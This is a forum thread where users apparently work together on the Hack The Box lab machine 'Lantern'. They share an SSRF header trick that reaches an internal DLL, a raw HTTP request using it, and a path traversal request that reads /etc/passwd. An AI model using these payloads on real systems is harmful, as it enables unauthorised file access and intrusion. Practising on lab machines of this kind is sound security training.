Posts: 200
Threads: 14
Joined: Apr 2024
(08-17-2024, 09:12 PM)htbtester12 Wrote: (08-17-2024, 09:10 PM)osamy7593 Wrote: (08-17-2024, 09:04 PM)jsvensson Wrote: (08-17-2024, 09:02 PM)osamy7593 Wrote: (08-17-2024, 08:58 PM)jsvensson Wrote: using dotpeek i found it - do you know with dnspy doesn't ?
u used pdf for ssrf? for ssrf just add header X-Skipper-Proxy: http://127.0.0.1:5000 in burp on request to / and then you will be able to get /_framework/InternaLantern.dll
tells failed to connect
GET /_framework/InternaLantern.dll HTTP/1.1
X-Skipper-Proxy: http://127.0.0.1:5000
Host: lantern.htb:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Should not be: Host: lantern.htb:5000
remove :5000 from the Host header nive worked
Ban reason:
Asking for rep is not allowed (Permanent)
Posts: 37
Threads: 0
Joined: Mar 2024
Posts: 107
Threads: 1
Joined: Apr 2024
we got lfi :
GET /PrivacyAndPolicy?lang=../../../../../../&ext=./etc/passwd
Posts: 200
Threads: 14
Joined: Apr 2024
(08-17-2024, 09:54 PM)jsvensson Wrote: we got lfi :
GET /PrivacyAndPolicy?lang=../../../../../../&ext=./etc/passwd
i tried from it to execute my uploaded .php not work only reads file its path traversal not lfi
Ban reason:
Asking for rep is not allowed (Permanent)
Posts: 107
Threads: 1
Joined: Apr 2024
08-17-2024, 10:14 PM
(This post was last modified: 08-17-2024, 10:22 PM by jsvensson.)
(08-17-2024, 10:10 PM)osamy7593 Wrote: (08-17-2024, 09:54 PM)jsvensson Wrote: we got lfi :
GET /PrivacyAndPolicy?lang=../../../../../../&ext=./etc/passwd
i tried from it to execute my uploaded .php not work only reads file its path traversal not lfi
yes my bad it's just path traversal
when try to manually change module got an error occurred: Could not load file or assembly '/opt/components/Fiasd.dll'.
not sure if we could do something with it
Posts: 13
Threads: 0
Joined: Feb 2024
(08-17-2024, 10:10 PM)osamy7593 Wrote: (08-17-2024, 09:54 PM)jsvensson Wrote: we got lfi :
GET /PrivacyAndPolicy?lang=../../../../../../&ext=./etc/passwd
i tried from it to execute my uploaded .php not work only reads file its path traversal not lfi akhee its a python and dotnet page , no php stuff here.
Posts: 200
Threads: 14
Joined: Apr 2024
(08-17-2024, 10:14 PM)jsvensson Wrote: (08-17-2024, 10:10 PM)osamy7593 Wrote: (08-17-2024, 09:54 PM)jsvensson Wrote: we got lfi :
GET /PrivacyAndPolicy?lang=../../../../../../&ext=./etc/passwd
i tried from it to execute my uploaded .php not work only reads file its path traversal not lfi
yes my bad it's just path traversal
when try to manually change module got an error occurred: Could not load file or assembly '/opt/components/Fiasd.dll'.
not sure if we could do something with it also noticed but i think no benefit
Ban reason:
Asking for rep is not allowed (Permanent)
Posts: 13
Threads: 0
Joined: Feb 2024
we have lfi try get Data.db
Posts: 3
Threads: 0
Joined: Jun 2024
(08-17-2024, 10:28 PM)Anaunimans Wrote: we have lfi try get Data.db
Thats what i am thinking but whats the root directory?
Posts: 107
Threads: 1
Joined: Apr 2024
(08-17-2024, 10:30 PM)letsnotencrypt Wrote: (08-17-2024, 10:28 PM)Anaunimans Wrote: we have lfi try get Data.db
Thats what i am thinking but whats the root directory?
Same question here
|
